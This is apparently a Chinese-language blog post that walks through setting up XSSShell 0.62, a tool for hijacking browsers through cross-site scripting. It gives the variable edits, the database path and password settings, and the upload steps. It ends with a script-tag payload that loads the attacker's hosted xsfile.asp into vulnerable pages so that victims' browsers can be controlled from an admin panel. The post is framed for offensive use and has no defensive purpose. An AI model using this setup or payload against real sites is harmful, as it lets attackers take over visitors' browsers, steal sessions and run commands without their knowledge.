最近关注了一下新的WooYun上的WEB漏洞,发现XSS在Web2.0时代真的是如鱼得水,异常活跃。XSS的利用也从简单的弹框,cookie获取,到了能够利用XSSShell实现彻底劫持目标浏览器的目的。XSSShell的功能很丰富,它的存在使得XSS点形成Second Shot,道生一,一生二,二生三,三生万物~并且被XSS的页面能够在新开的页面当中注入同样的代码实现对此后所有页面的JS使用权的驾驭。但真正付诸使用,配置是挺烦的一件事,要改很多文件,想来作者以后应该提供个配置脚本简化这一过程。
以最新的版本0.62叙述一下配置的过程,配置的目的如下:
- 客户端部署在http://www.mysite.com/myxsspath/xsfile.asp
- 服务端部署在http://www.mysite.com/myxsspath/admin/
- 数据库部署在http://www.mysite.com/myxsspath/db/
mysite,myxsspath都是依据你自己的ASP空间的真实情况来配置的,xsfile.asp就是原xssshell.asp,我改了个名字而已。
将xssshell.asp改名为xsfile.asp ,然后编辑xsfile.asp,修改72行起的四个变量
- var SERVER = “http://www.mysite.com/myxsspath/admin/“;
- var ME = SERVER + “xsfile.asp?p=1<%=VicAdd%>” ;
- var CONNECTOR = SERVER + “admin/connector.asp”;
- var COMMANDS_URL = SERVER + “admin/commands.asp”;
接下来修改db.asp
- Const DBPATH=(指向你的站点数据库文件绝对路径)
- 相信使用XSSShell和拥有Web空间的人都知道怎么获取这个路径,比如用ASP的Server.MapPath。
- 下面一个参数是口令的设置,搜索w00t这个字符串,然后替换为你希望的口令即可。
准备工作就绪,上传admin目录,db目录和xsfile.asp到指定位置。
只要在有XSS问题的页面插入
<script src=http://www.mysite.com/myxsspath/xsfile.asp />
就可以使用了。登录http://www.mysite.com/myxsspath/admin,管理这些上线的XSSers吧。